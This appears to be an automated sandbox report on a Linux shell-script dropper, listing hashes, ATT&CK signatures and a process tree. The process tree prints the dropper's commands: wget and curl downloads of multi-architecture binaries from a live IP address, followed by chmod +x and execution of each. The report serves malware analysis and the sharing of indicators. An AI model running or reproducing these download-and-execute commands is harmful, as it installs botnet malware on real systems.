Analysis
- max time kernel: 26s
- max time network: 64s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 24/11/2024, 01:19
Static task
- static1
Behavioral tasks
- behavioral1
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: ubuntu1804-amd64-20240611-en
- behavioral2
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-armhf-20240611-en
- behavioral3
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-mipsbe-20240611-en
- behavioral4
  Sample: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  Resource: debian9-mipsel-20240226-en
General
- Target: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
- Size: 1KB
- MD5: 513641f5f60d55559c2060489de6d605
- SHA1: c95feec2255732b60d434b0639b88a5cff205ea0
- SHA256: 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd
- SHA512: 71ee20fe10e58b1d9a0e0e5268ba264e35e15e3a5190cfdf5950245579fbbdabd9aef7dc11e9398e0df8add1afb1400a0134911b6ebb9deb937b578fc52775e0
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid  process
  689  chmod
  710  chmod
  741  chmod
  791  chmod
  809  chmod
  761  chmod
  797  chmod
  803  chmod
  815  chmod
  823  chmod
- Executes dropped EXE (10 IoCs)
  ioc        pid  process
  /tmp/3AvA  690  3AvA
  /tmp/3AvA  711  3AvA
  /tmp/3AvA  743  3AvA
  /tmp/3AvA  762  3AvA
  /tmp/3AvA  792  3AvA
  /tmp/3AvA  798  3AvA
  /tmp/3AvA  804  3AvA
  /tmp/3AvA  810  3AvA
  /tmp/3AvA  816  3AvA
  /tmp/3AvA  824  3AvA
- Checks CPU configuration (1 TTPs, 10 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  description              ioc            process
  File opened for reading  /proc/cpuinfo  curl     (10 identical rows)
- Reads runtime system information
  description              ioc                            process
  File opened for reading  /proc/self/auxv                curl     (10 rows)
  File opened for reading  /proc/sys/crypto/fips_enabled  curl     (10 rows)
- System Network Configuration Discovery (1 TTPs, 4 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid  process
  692  wget
  693  curl
  708  cat
  711  3AvA
- Writes file to tmp directory (1 IoCs)
  Malware often drops required files in the /tmp directory.
  description                   ioc        process
  File opened for modification  /tmp/3AvA  1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
Processes
- /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh (PID 659)
  command: /tmp/1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh
  signatures: Writes file to tmp directory
  - /usr/bin/wget (PID 661)
    command: wget http://89.22.230.162/bins/UnHAnaAW.x86
  - /usr/bin/curl (PID 673)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.x86
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 688)
    command: cat UnHAnaAW.x86
  - /bin/chmod (PID 689)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 690)
    command: ./3AvA x86
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 692)
    command: wget http://89.22.230.162/bins/UnHAnaAW.mips
    signatures: System Network Configuration Discovery
  - /usr/bin/curl (PID 693)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.mips
    signatures: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery
  - /bin/cat (PID 708)
    command: cat UnHAnaAW.mips
    signatures: System Network Configuration Discovery
  - /bin/chmod (PID 710)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 711)
    command: ./3AvA mips
    signatures: Executes dropped EXE; System Network Configuration Discovery
  - /usr/bin/wget (PID 714)
    command: wget http://89.22.230.162/bins/UnHAnaAW.mpsl
  - /usr/bin/curl (PID 718)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.mpsl
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 740)
    command: cat UnHAnaAW.mpsl
  - /bin/chmod (PID 741)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 743)
    command: ./3AvA mpsl
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 747)
    command: wget http://89.22.230.162/bins/UnHAnaAW.arm4
  - /usr/bin/curl (PID 752)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.arm4
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 760)
    command: cat UnHAnaAW.arm4
  - /bin/chmod (PID 761)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 762)
    command: ./3AvA arm4
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 765)
    command: wget http://89.22.230.162/bins/UnHAnaAW.arm5
  - /usr/bin/curl (PID 769)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.arm5
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 790)
    command: cat UnHAnaAW.arm5
  - /bin/chmod (PID 791)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 792)
    command: ./3AvA arm5
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 794)
    command: wget http://89.22.230.162/bins/UnHAnaAW.arm6
  - /usr/bin/curl (PID 795)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.arm6
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 796)
    command: cat UnHAnaAW.arm6
  - /bin/chmod (PID 797)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 798)
    command: ./3AvA arm6
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 800)
    command: wget http://89.22.230.162/bins/UnHAnaAW.arm7
  - /usr/bin/curl (PID 801)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.arm7
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 802)
    command: cat UnHAnaAW.arm7
  - /bin/chmod (PID 803)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 804)
    command: ./3AvA arm7
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 806)
    command: wget http://89.22.230.162/bins/UnHAnaAW.ppc
  - /usr/bin/curl (PID 807)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.ppc
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 808)
    command: cat UnHAnaAW.ppc
  - /bin/chmod (PID 809)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 810)
    command: ./3AvA ppc
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 812)
    command: wget http://89.22.230.162/bins/UnHAnaAW.m68k
  - /usr/bin/curl (PID 813)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.m68k
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 814)
    command: cat UnHAnaAW.m68k
  - /bin/chmod (PID 815)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 816)
    command: ./3AvA m68k
    signatures: Executes dropped EXE
  - /usr/bin/wget (PID 818)
    command: wget http://89.22.230.162/bins/UnHAnaAW.sh4
  - /usr/bin/curl (PID 821)
    command: curl -O http://89.22.230.162/bins/UnHAnaAW.sh4
    signatures: Checks CPU configuration; Reads runtime system information
  - /bin/cat (PID 822)
    command: cat UnHAnaAW.sh4
  - /bin/chmod (PID 823)
    command: chmod +x 1100eaedb376144012b559268f7ee73e8bfe32e9fc79072c193d1560fbbe34dd.sh 3AvA systemd-private-0bae92cbb9d14892b3e27531eb3a3870-systemd-timedated.service-R8E1FF
    signatures: File and Directory Permissions Modification
  - /tmp/3AvA (PID 824)
    command: ./3AvA sh4
    signatures: Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)